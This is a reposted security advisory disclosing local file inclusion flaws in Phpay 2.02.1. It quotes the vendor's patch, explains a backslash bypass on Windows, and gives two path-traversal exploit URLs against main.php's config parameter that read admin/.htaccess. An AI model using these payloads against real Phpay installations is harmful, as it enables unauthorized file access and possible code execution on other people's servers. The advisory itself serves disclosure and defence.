Phpay - Local File Inclusion - SecurityReason.com

Advisory Text :

By Michael Brooks

Vulnerability Type:Local File Inclusion

Software: Phpay

Homepage:http://sourceforge.net/projects/phpay/

Version Affected:2.02.1

Phpay has been affected by multiple local file include flaws, as a result
this patch was written:

$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php";
echo "n";}

if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you
backup it after installation? ..."; exit;}

require("./$config");

To bypass this patch backslashes can be used instead of forward slashes on
windows systems.

Also .inc.php must exists *somewhere* in the string.

Local File Include for windows only:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.
htaccess

or if magic_quotes_gpc is turned on:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php..admin.hta
ccess

Remote code execution is accessible in the ./admin/ folder.

The admin folder *should* be protected by a .htaccess file similar to
osCommerce2.

Vulnerable configuration:

A there is a call to extract($_GET) so the exploit will work regardless of
register_globals. Using Linux is a very good fix for this issue.

Merry Christmas

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

Phpay - Local File Inclusion